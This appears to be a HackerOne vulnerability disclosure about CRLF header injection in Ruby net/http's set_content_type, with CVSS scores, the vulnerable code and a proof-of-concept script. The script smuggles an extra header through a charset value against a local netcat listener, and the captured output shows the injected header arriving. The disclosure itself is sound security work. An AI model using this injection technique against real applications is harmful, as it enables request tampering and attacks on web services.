Ruby: 'net/http': HTTP Header Injection in the set_content_type method

2021-04-1909:25:39

sighook

hackerone.com

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.002 Low

EPSS

Percentile

61.2%

JSON

The set_content_type’s parameter is not filtered to prevent the injection from altering the entire request.

The vulnerable code:

  def set_content_type(type, params = {})
    @header['content-type'] = [type + params.map{|k,v|"; #{k}=#{v}"}.join('')]
  end

PoC

require 'net/http'

uri = URI('http://127.0.0.1:8080')
req = Net::HTTP::Post.new(uri)
req.set_content_type('text/html', "charset" =&gt; "iso-8859-1\nHeader:Inject")

resp = Net::HTTP.start(uri.hostname, uri.port) do |http|
  http.request(req)
end

$ nc -lvp 8080
Listening on 0.0.0.0 8080
Connection received on localhost 57620
POST / HTTP/1.1
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
Host: 127.0.0.1:8080
Content-Type: text/html; charset=iso-8859-1
Header:Inject # &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
Content-Length: 0

I set the same severity as CVE-2020-26116 has.

Impact

In web applications a CRLF injection can have severe impacts, depending on what the application does with single items. Impacts can range from information disclosure to code execution, a direct impact web application security vulnerability.